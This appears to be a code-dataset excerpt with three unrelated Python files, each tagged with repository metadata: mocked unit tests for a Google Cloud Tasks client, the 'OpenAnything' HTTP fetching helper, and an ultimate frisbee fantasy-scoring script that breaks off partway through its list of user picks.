# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.run_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_run_task_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.run_task(
cloudtasks.RunTaskRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_run_task_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.run_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_run_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.run_task(
cloudtasks.RunTaskRequest(), name="name_value",
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CloudTasksClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide an api_key and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
options = client_options.ClientOptions()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = CloudTasksClient(client_options=options, transport=transport,)
# It is an error to provide an api_key and a credential.
options = mock.Mock()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = CloudTasksClient(
client_options=options, credentials=ga_credentials.AnonymousCredentials()
)
# It is an error to provide scopes and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CloudTasksClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = CloudTasksClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.CloudTasksGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize(
"transport_class",
[transports.CloudTasksGrpcTransport, transports.CloudTasksGrpcAsyncIOTransport,],
)
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
assert isinstance(client.transport, transports.CloudTasksGrpcTransport,)
def test_cloud_tasks_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.CloudTasksTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_cloud_tasks_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.tasks_v2beta2.services.cloud_tasks.transports.CloudTasksTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.CloudTasksTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"list_queues",
"get_queue",
"create_queue",
"update_queue",
"delete_queue",
"purge_queue",
"pause_queue",
"resume_queue",
"get_iam_policy",
"set_iam_policy",
"test_iam_permissions",
"list_tasks",
"get_task",
"create_task",
"delete_task",
"lease_tasks",
"acknowledge_task",
"renew_lease",
"cancel_lease",
"run_task",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
def test_cloud_tasks_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.tasks_v2beta2.services.cloud_tasks.transports.CloudTasksTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.CloudTasksTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
def test_cloud_tasks_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.tasks_v2beta2.services.cloud_tasks.transports.CloudTasksTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.CloudTasksTransport()
adc.assert_called_once()
def test_cloud_tasks_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
CloudTasksClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[transports.CloudTasksGrpcTransport, transports.CloudTasksGrpcAsyncIOTransport,],
)
def test_cloud_tasks_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.CloudTasksGrpcTransport, grpc_helpers),
(transports.CloudTasksGrpcAsyncIOTransport, grpc_helpers_async),
],
)
def test_cloud_tasks_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
create_channel.assert_called_with(
"cloudtasks.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
scopes=["1", "2"],
default_host="cloudtasks.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"transport_class",
[transports.CloudTasksGrpcTransport, transports.CloudTasksGrpcAsyncIOTransport],
)
def test_cloud_tasks_grpc_transport_client_cert_source_for_mtls(transport_class):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds,
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback,
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert, private_key=expected_key
)
def test_cloud_tasks_host_no_port():
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="cloudtasks.googleapis.com"
),
)
assert client.transport._host == "cloudtasks.googleapis.com:443"
def test_cloud_tasks_host_with_port():
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="cloudtasks.googleapis.com:8000"
),
)
assert client.transport._host == "cloudtasks.googleapis.com:8000"
def test_cloud_tasks_grpc_transport_channel():
channel = grpc.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.CloudTasksGrpcTransport(
host="squid.clam.whelk", channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
    assert transport._ssl_channel_credentials is None
def test_cloud_tasks_grpc_asyncio_transport_channel():
channel = aio.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.CloudTasksGrpcAsyncIOTransport(
host="squid.clam.whelk", channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
    assert transport._ssl_channel_credentials is None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
"transport_class",
[transports.CloudTasksGrpcTransport, transports.CloudTasksGrpcAsyncIOTransport],
)
def test_cloud_tasks_transport_channel_mtls_with_client_cert_source(transport_class):
with mock.patch(
"grpc.ssl_channel_credentials", autospec=True
) as grpc_ssl_channel_cred:
with mock.patch.object(
transport_class, "create_channel"
) as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
"transport_class",
[transports.CloudTasksGrpcTransport, transports.CloudTasksGrpcAsyncIOTransport],
)
def test_cloud_tasks_transport_channel_mtls_with_adc(transport_class):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(
transport_class, "create_channel"
) as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_queue_path():
project = "squid"
location = "clam"
queue = "whelk"
expected = "projects/{project}/locations/{location}/queues/{queue}".format(
project=project, location=location, queue=queue,
)
actual = CloudTasksClient.queue_path(project, location, queue)
assert expected == actual
def test_parse_queue_path():
expected = {
"project": "octopus",
"location": "oyster",
"queue": "nudibranch",
}
path = CloudTasksClient.queue_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_queue_path(path)
assert expected == actual
def test_task_path():
project = "cuttlefish"
location = "mussel"
queue = "winkle"
task = "nautilus"
expected = "projects/{project}/locations/{location}/queues/{queue}/tasks/{task}".format(
project=project, location=location, queue=queue, task=task,
)
actual = CloudTasksClient.task_path(project, location, queue, task)
assert expected == actual
def test_parse_task_path():
expected = {
"project": "scallop",
"location": "abalone",
"queue": "squid",
"task": "clam",
}
path = CloudTasksClient.task_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_task_path(path)
assert expected == actual
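# A quick illustration of the template round-trip above (the resource names here
# are only hypothetical examples, not values used by the tests):
#   CloudTasksClient.task_path("my-project", "us-central1", "my-queue", "my-task")
#   -> "projects/my-project/locations/us-central1/queues/my-queue/tasks/my-task"
#   CloudTasksClient.parse_task_path(...) recovers the same four components.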
def test_common_billing_account_path():
billing_account = "whelk"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = CloudTasksClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "octopus",
}
path = CloudTasksClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "oyster"
expected = "folders/{folder}".format(folder=folder,)
actual = CloudTasksClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "nudibranch",
}
path = CloudTasksClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "cuttlefish"
expected = "organizations/{organization}".format(organization=organization,)
actual = CloudTasksClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "mussel",
}
path = CloudTasksClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "winkle"
expected = "projects/{project}".format(project=project,)
actual = CloudTasksClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "nautilus",
}
path = CloudTasksClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "scallop"
location = "abalone"
expected = "projects/{project}/locations/{location}".format(
project=project, location=location,
)
actual = CloudTasksClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "squid",
"location": "clam",
}
path = CloudTasksClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_common_location_path(path)
assert expected == actual
def test_client_with_default_client_info():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.CloudTasksTransport, "_prep_wrapped_messages"
) as prep:
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.CloudTasksTransport, "_prep_wrapped_messages"
) as prep:
transport_class = CloudTasksClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc_asyncio",
)
with mock.patch.object(
type(getattr(client.transport, "grpc_channel")), "close"
) as close:
async with client:
close.assert_not_called()
close.assert_called_once()
def test_transport_close():
transports = {
"grpc": "_grpc_channel",
}
for transport, close_name in transports.items():
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
with mock.patch.object(
type(getattr(client.transport, close_name)), "close"
) as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
"grpc",
]
for transport in transports:
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
@pytest.mark.parametrize(
"client_class,transport_class",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport),
(CloudTasksAsyncClient, transports.CloudTasksGrpcAsyncIOTransport),
],
)
def test_api_key_credentials(client_class, transport_class):
with mock.patch.object(
google.auth._default, "get_api_key_credentials", create=True
) as get_api_key_credentials:
mock_cred = mock.Mock()
get_api_key_credentials.return_value = mock_cred
options = client_options.ClientOptions()
options.api_key = "api_key"
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=mock_cred,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
| googleapis/python-tasks | tests/unit/gapic/tasks_v2beta2/test_cloud_tasks.py | Python | apache-2.0 | 219,688 | ["Octopus"] | 67844a2758a5b04043be0997d28fe1ae5aa25755ef5f6806c7bc99af4b956522 |
'''OpenAnything: a kind and thoughtful library for HTTP web services
This program is part of 'Dive Into Python', a free Python book for
experienced programmers. Visit http://diveintopython.org/ for the
latest version.
This library has been slightly modified by Mike Miller, 2005.
- changed function name
- rearranged order of type checks in opn function (a URL is the least likely input)
- removed fetch
'''
__author__ = 'Mark Pilgrim (mark@diveintopython.org)'
__version__ = '$Revision: 1.6 $'[11:-2]
__date__ = '$Date: 2004/04/16 21:16:24 $'
__copyright__ = 'Copyright (c) 2004 Mark Pilgrim'
__license__ = 'Python'
import sys, urllib2, urlparse, gzip
from StringIO import StringIO
USER_AGENT = 'OpenAnything/%s +http://diveintopython.org/http_web_services/' % __version__
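# The two handler classes below keep the numeric HTTP status visible to callers:
# SmartRedirectHandler copies the original 301/302 code onto the redirected
# response, and DefaultErrorHandler returns error responses (including 304 Not
# Modified) as objects carrying a .status attribute instead of raising.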
class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_301(self, req, fp, code, msg, headers):
result = urllib2.HTTPRedirectHandler.http_error_301(
self, req, fp, code, msg, headers)
result.status = code
return result
def http_error_302(self, req, fp, code, msg, headers):
result = urllib2.HTTPRedirectHandler.http_error_302(
self, req, fp, code, msg, headers)
result.status = code
return result
class DefaultErrorHandler(urllib2.HTTPDefaultErrorHandler):
def http_error_default(self, req, fp, code, msg, headers):
result = urllib2.HTTPError(
req.get_full_url(), code, msg, headers, fp)
result.status = code
return result
def opn(source, etag=None, lastmodified=None, agent=USER_AGENT):
"""URL, filename, or string --> stream
This function lets you define parsers that take any input source
(URL, pathname to local or network file, or actual data as a string)
and deal with it in a uniform manner. Returned object is guaranteed
to have all the basic stdio read methods (read, readline, readlines).
Just .close() the object when you're done with it.
If the etag argument is supplied, it will be used as the value of an
If-None-Match request header.
If the lastmodified argument is supplied, it must be a formatted
date/time string in GMT (as returned in the Last-Modified header of
a previous request). The formatted date/time will be used
as the value of an If-Modified-Since request header.
If the agent argument is supplied, it will be used as the value of a
User-Agent request header.
"""
if hasattr(source, 'read'): # already a file obj
return source
if source == '-':
return sys.stdin
# try to open with native open function (if source is a filename)
try:
return open(source)
except (IOError, OSError):
pass
# A URL is less likely so I moved it down a notch.
if urlparse.urlparse(source)[0] == 'http':
# open URL with urllib2
request = urllib2.Request(source)
request.add_header('User-Agent', agent)
if lastmodified:
request.add_header('If-Modified-Since', lastmodified)
if etag:
request.add_header('If-None-Match', etag)
request.add_header('Accept-encoding', 'gzip')
opener = urllib2.build_opener(SmartRedirectHandler(), DefaultErrorHandler())
return opener.open(request)
# treat source as string
return StringIO(str(source))
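# A minimal conditional-GET sketch using opn(); the URL is only illustrative and
# it assumes a server that returns ETag / Last-Modified headers.
#
#     first = opn('http://example.com/feed.xml')
#     data = first.read()
#     etag = first.headers.get('ETag')
#     lastmodified = first.headers.get('Last-Modified')
#     first.close()
#     # Pass the validators back on the next request; thanks to DefaultErrorHandler
#     # a 304 arrives as a response whose .status attribute is 304, not an exception.
#     second = opn('http://example.com/feed.xml', etag=etag, lastmodified=lastmodified)
#     if getattr(second, 'status', 200) == 304:
#         pass  # cached copy is still fresh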
| Recaiden/pysh | lib/openanything.py | Python | gpl-2.0 | 3,377 | ["VisIt"] | 8b91585cf41b46028428f2da61b319edff6c4ed08f50adb68fe27149c4a7a689 |
#!/usr/bin/env python
"""
Summarize ultimate fantasy scores and results.
"""
from __future__ import print_function
import argparse
import numpy as np
import pandas as pd
from usau import markdown, reports
def compute_fantasy_picks(captain_multiplier=2, from_csv=False, fantasy_input=None):
"""Convert fantasy picks to an indicator matrix"""
    # I'll wait until the next fantasy contest to see if this should be generalized.
if from_csv:
reports.d1_college_nats_men_2016.load_from_csvs()
reports.d1_college_nats_women_2016.load_from_csvs()
fantasy_mens = reports.d1_college_nats_men_2016.rosters
fantasy_womens = reports.d1_college_nats_women_2016.rosters
fantasy_input = fantasy_input or get_fantasy_input()
for user, fantasy_lines in fantasy_input.iteritems():
fantasy_mens[user] = 0
fantasy_womens[user] = 0
for gender, fantasy_line in fantasy_lines.iteritems():
for player in fantasy_line:
player_multiplier = 1
if player.endswith("*"):
player_multiplier = captain_multiplier
player = player[:-1]
player = player.strip()
if gender == "Men":
fantasy = fantasy_mens
elif gender == "Women":
fantasy = fantasy_womens
# Try to guess name. First based on matching full name, then
# by matching on last name.
mask = fantasy.UpperName.str.contains(player.upper())
if sum(mask) == 1:
fantasy[user] += mask * player_multiplier
elif sum(mask) > 1:
print("Found multiple matching players:",
user, player, fantasy.loc[mask, "UpperName"].values)
else:
mask = fantasy.UpperName.str.contains(
player.split()[-1].upper())
if sum(mask) == 1:
fantasy[user] += mask * player_multiplier
else:
print("Found multiple or no matching players:",
user, player, fantasy.loc[mask, "UpperName"].values)
users = sorted(fantasy_input.keys(), key=lambda x: x.upper())
assert all(fantasy_mens[users].sum() == 6 + captain_multiplier)
assert all(fantasy_womens[users].sum() == 6 + captain_multiplier)
fantasy_mens["Fantasy Picks"] = fantasy_mens[users].sum(axis=1)
fantasy_womens["Fantasy Picks"] = fantasy_womens[users].sum(axis=1)
return fantasy_mens, fantasy_womens, users
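# The frames returned above act as indicator matrices: each user's column holds 0
# for players they did not pick, 1 for a regular pick, and captain_multiplier for
# their captain, so every user column sums to 6 + captain_multiplier (enforced by
# the asserts), and the "Fantasy Picks" column is the (captain-weighted) total of
# picks across all entrants.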
def compute_athlete_fantasy_scores(df, min_players=20, goal_weight=1, assist_weight=1,
d_weight=0.2, turn_weight=-0.2):
"""Compute fantasy score
Args:
df (pd.DataFrame): Player contributions and fantasy picks
min_players (int): Minimum number of players to show, sorted by fantasy score
"""
df["Fantasy Score"] = (df.Goals * goal_weight + df.Assists * assist_weight +
df.Ds * d_weight + df.Turns * turn_weight)
# Sort players by fantasy score and mark top min_players
top_fantasy_players = np.zeros(len(df), dtype=np.bool)
top_fantasy_players[df["Fantasy Score"].argsort(
).values[::-1][:min_players]] = True
# Union of all players with non-zero fantasy picks and top min_players by fantasy score
result = (df[(df["Fantasy Picks"] > 0) | top_fantasy_players]
.sort(["Fantasy Score", "Seed"], ascending=False))
return result
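# Worked example of the scoring formula with the default weights (goals and
# assists worth 1, Ds 0.2, turns -0.2): a player with 5 goals, 3 assists, 2 Ds
# and 4 turns scores 5 + 3 + 0.4 - 0.8 = 7.6 fantasy points.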
def compute_fantasy_contest_results(min_players=20, use_markdown=False, display=True, from_csv=False,
fantasy_input=None, beta=0.2, captain_multiplier=2):
"""Calculate fantasy results (for athletes and contest users)
Args:
min_players (int): Minimum number of players to show
display (bool): Display results to stdout / jupyter
use_markdown (bool): Print results as a markdown-formatted table
from_csv (bool): Load data from offline csvs
"""
mens, womens, users = compute_fantasy_picks(from_csv=from_csv, captain_multiplier=captain_multiplier,
fantasy_input=fantasy_input)
# Show the top-scoring players, sorted by fantasy score
mens = compute_athlete_fantasy_scores(mens, min_players=min_players,
d_weight=beta, turn_weight=-beta)
womens = compute_athlete_fantasy_scores(womens, min_players=min_players,
d_weight=beta, turn_weight=-beta)
if display:
display_cols = ["No.", "Name", "Fantasy Score", "Position", "Height",
"Goals", "Assists", "Ds", "Turns",
"Team", "Seed", "Fantasy Picks"]
markdown.display(mens[display_cols], use_markdown=use_markdown)
markdown.display(womens[display_cols], use_markdown=use_markdown)
# Show the fantasy contest users sorted by fantasy score
results = []
for user in users:
results.append({"User": user,
"Men's": sum(mens["Fantasy Score"] * mens[user]),
"Women's": sum(womens["Fantasy Score"] * womens[user])})
results = pd.DataFrame(results)
results["Total"] = results["Men's"] + results["Women's"]
results = results.sort("Total", ascending=False)[
["User", "Total", "Men's", "Women's"]]
if display:
markdown.display(results, use_markdown=use_markdown)
return results
def get_fantasy_input():
"""Mapping of users to fantasy lines, with captain marked by asterisk.
Each fantasy line should have exactly 7 players, one of which is marked captain.
This probably should be offloaded to some configuration file.
"""
return {
"scottyskin96": {
"Men": ["Dalton Smith", "John Stubbs*", "Xavier Maxstadt", "Ben Jagt", "Joe Marmerstein", "Khalif", "Trent Dillon"],
"Women": ["Shofner*", "Kaylor", "Wahlroos", "Marisa Rafter", "Claire revere", "Mira Donaldson", "Han Chen"],
},
"chubs45": {
"Men": ["Ben Jagt*", "Jack Williams", "John Stubbs", "Connor Kline", "Max Thorne", "Dalton Smith", "Jeff Babbitt"],
"Women": ["Jesse Shofner*", "Marisa Rafter", "Han Chen", "Mira Donaldson", "Janina Freystaetter", "Jacyln Verzuh", "Kirstin Johnson"],
},
"duthracht": {
"Men": ["John Stubbs", "Aaron Speiss", "Khalif El-Salaam", "Dalton Smith", "Ben Jagt", "Xavier Maxstadt*", "Jack Williams"],
"Women": ["Marisa Rafter", "Jesse Shofner*", "Han Chen", "Mira Donaldson", "Kristin Pojunis", "Janina Freystaetter", "Angela Zhu"],
},
"giftedbadly": {
"Men": ["Dalton Smith*", "Tannor Johnson", "Trent Dillon", "Pat Earles", "Jack Williams", "John Stubbs", "Jeff Babbitt"],
"Women": ["Mira Donaldson*", "Jesse Shofner", "Janina Freystaetter", "Claire Revere", "Marisa Rafter", "Angela Zhu", "Kristen Pojunis"],
},
"krdonnie": {
"Men": ["John Stubbs", "Pat Earles", "Mark Vandenberg*", "Sam Little", "Dalton Smith", "Connor Holcombe", "Ben Jagt"],
"Women": ["Carolyn Normile", "Shayna Brock", "Jesse Shofner*", "Mira Donaldson", "Han Chen", "Chloe Rowse", "Janina Freystaetter"],
},
"Ultimatezach": {
"Men": ["Dalton Smith*", "Ben Jagt", "Xavier Maxstadt", "Khalif El-Salaam", "Trent Dillon", "John Stubbs", "Tannor Johnson"],
"Women": ["Jesse Shofner*", "Mira Donaldson", "Marisa Rafter", "Kristin Pojunis", "Janina Freystaetter", "Kirstin Johnson", "Bethany Kaylor"],
},
"dlquinonesII": {
"Men": ["Ben Jagt", "John Stubbs", "Dalton Smith*", "Conor Kline", "Xavier Maxstadt", "Khalif El-Salaam", "Trent Dillon"],
"Women": ["Mira Donaldson", "Janina Freystaetter", "Shayna Brock", "Claire Revere", "Jesse Shofner*", "Han Chen", "Carolyn Normile"],
},
"ultimatefrisbee": {
"Men": ["Dalton Smith", "Xavier Maxstadt", "Ben Jagt", "Khalif El-Salaam*", "Mark Vandenberg", "John Stubbs", "Ryan Landry"],
"Women": ["Mira Donaldson*", "Olivia Bartruff", "Jesse Shofner", "Monisha White", "Jaclyn Verzuh", "Claire Revere", "Kristen Pojunis"],
},
"livetweetyourgames": {
"Men": ["Tannor Johnson*", "Conor Kline", "Connor Matthews", "Connor Holcombe", "Max Thorne", "Ben Jagt", "Dalton Smith"],
"Women": ["Janina Freystaetter*", "Shayna Brock", "Mira Donaldson", "Kate Scarth", "Olivia Bartruff", "Jesse Shofner", "Courtney Gegg"],
},
"anti_spiral": {
"Men": ["Dalton Smith*", "Pat Earles", "Tannor Johnson", "Connor Matthews", "Jack Williams", "Jeff Babbitt", "John Stubbs"],
"Women": ["Kate Scarth", "Bethany Kaylor", "Courtney Gegg*", "Hayley Wahlroos", "Abbie Abramovich", "Mira Donaldson", "Alexa Wood"],
},
"grhgra002": {
"Men": ["Dalton Smith*", "John Stubbs", "Mark Vandenberg", "Xavier Maxstadt", "Ben Jagt", "Khalif El-Salaam", "Connor Matthews"],
"Women": ["Jesse Shofner*", "Marisa Rafter", "Mira Donaldson", "Han Chen", "Kristin Pojunis", "Courtney Gegg", "Claire Revere"],
},
"samth": {
"Women": ["Shofner*", "Kaylor", "Verzuh", "Donaldson", "Wahlroos", "Brock", "Freystaetter"],
"Men": ["Trent Dillon", "Maxstadt", "Kline", "Babbit*", "Sadok", "Jagt", "Stubbs"],
},
"almondchipcookies": {
"Men": ["Jeff Babbit*", "Connor Matthews", "Adam Rees", "Ryan Osgar", "Pat Earles", "Dalton Smith", "John Stubbs"],
"Women": ["Beth Kaylor*", "Jesse Shofner", "Mira Donaldson", "Monisha White", "Shayna Brock", "Han Chen", "Angela Zhu"],
},
